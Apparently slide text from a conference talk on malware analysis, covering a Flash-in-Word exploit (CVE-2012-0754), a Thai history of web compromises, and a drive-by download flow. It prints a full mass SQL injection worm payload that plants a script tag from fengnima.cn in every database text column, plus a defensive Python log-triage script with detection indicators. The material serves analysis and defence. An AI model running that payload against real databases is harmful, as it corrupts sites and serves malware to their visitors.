Advanced Malware Analysis
1. www.cdicconference.com
“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”
Dissecting Malicious Programs with Cutting-Edge Techniques
Prathan Phongthiproek (อ. ประธาน พงศ์ทิพย์ฤกษ์)
SANS GIAC GPEN, eCPPT, ECSA, CEH, CPTS, CIW Security Analyst, CWNA, CWSP, Security+, ITIL-F
Section Manager, Senior Information Security Consultant
ACIS Professional Center
2. Let’s Party Rock
Next Generation for Malware
Malware Analysis
Web Based Malware
Back to the Past
Back to the Future
Lab Challenge
9. Latest Malware Trends
MS Office+Flash Player
PDF Reader
Mobile Application
Social Network Application
Web Browser Toolbar
Web based Malware
12. CVE-2012-0754: SWF in DOC
“Iran’s Oil and Nuclear Situation.doc”
Contains an embedded Flash object that instructs Flash Player to download and parse a malformed MP4.
Affected desktop versions:
Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux and Solaris
Affected mobile versions:
Adobe Flash Player before 11.1.111.6 on Android 2.x and 3.x, and before 11.1.115.6 on Android 4.x
13. Document Analysis
Decompiled Flash (ActionScript) from the file:
this.MyNS.play("http://208.115.230.76/test.mp4");
Whois – 208.115.230.76
208.115.230.76
76-230-115-208.static.reverse.lstn.net
Host reachable, 77 ms average, 2 of 4 pings lost
208.115.192.0 - 208.115.255.255
Limestone Networks, Inc., 400 S. Akard Street, Suite 200, Dallas, TX 75202, United States
26. About My Memory
2008
The Oishi website was hacked without defacement
Kaspersky AV alert for “A little javascript file”
2009
SQL injection worms on MSSQL
Affected many banks in Thailand
2010
Google and Firefox alerts for malware-hosting websites
Obfuscated JS to bypass AV
2011
Many websites were blocked by Google's malware warnings
28. SQL Injection Worms
Injected payload as seen in the request (a cursor loop that appends a script tag to every text column of every user table):
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.fengnima.cn/k.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
AS%20NVARCHAR(4000));EXEC(@S);--
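A log-triage script written for this page as an added example (not from the original deck): it URL-decodes each request line, decodes the hex-encoded CAST() argument these worms used to hide the cursor loop shown above, raises an alert only when several indicators appear together, and extracts the injected script URL for blocking and cleanup. The UTF-16LE hex encoding of the inner SQL and the malicious.example domain are assumptions for the constructed sample.

```python
import re
from urllib.parse import unquote

# Decoded T-SQL body, constructed for this example after the worm above,
# with a placeholder domain in place of the real one.
INNER_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,"
    "syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 "
    "or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM "
    "Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] "
    "set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script "
    "src=http://malicious.example/k.js></script>''') FETCH NEXT FROM "
    "Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
# Assumption: the CAST argument travels as 0x-prefixed UTF-16LE hex, which is
# how these worms kept keywords like 'sysobjects' out of the raw request.
HEX_BODY = INNER_SQL.encode("utf-16-le").hex().upper()

# Constructed access-log request lines (not from the original deck).
SAMPLE_REQUESTS = [
    "GET /news.asp?id=42 HTTP/1.1",
    "GET /news.asp?id=42';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    + HEX_BODY + "%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.1",
]

CAST_HEX = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script\s+src=[\"']?([^\"'\s>]+)", re.IGNORECASE)
INDICATORS = ("sysobjects", "syscolumns", "CURSOR", "EXEC(@S)", "<script")


def decode_cast_hex(hex_body: str) -> str:
    """Turn the 0x... CAST argument (UTF-16LE) back into readable T-SQL."""
    return bytes.fromhex(hex_body).decode("utf-16-le", errors="replace")


def analyze_request(line: str):
    """Return a finding dict for a mass-SQL-injection request, else None."""
    decoded = unquote(line)  # undo %20 and other URL encoding
    expanded = decoded
    for match in CAST_HEX.finditer(decoded):  # append the decoded inner SQL
        expanded += " " + decode_cast_hex(match.group(1))
    hits = [i for i in INDICATORS if i.lower() in expanded.lower()]
    if len(hits) < 3:  # a single keyword alone is weak evidence
        return None
    return {"indicators": hits,
            "injected_urls": SCRIPT_SRC.findall(expanded),
            "decoded": expanded}
```

Run it over SAMPLE_REQUESTS: the benign query returns None, the worm request returns the indicator list plus the script URL to feed into blocklists and the column cleanup query.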
35. Drive-By Download
Flow of the attack (web server on the left, malware server on the right):
The victim visits a malicious website (web server)
Malicious JS executes in the browser
The browser is redirected to the malware server
The malware server exploits the browser / Flash Player
A reverse shell connects back to the attacker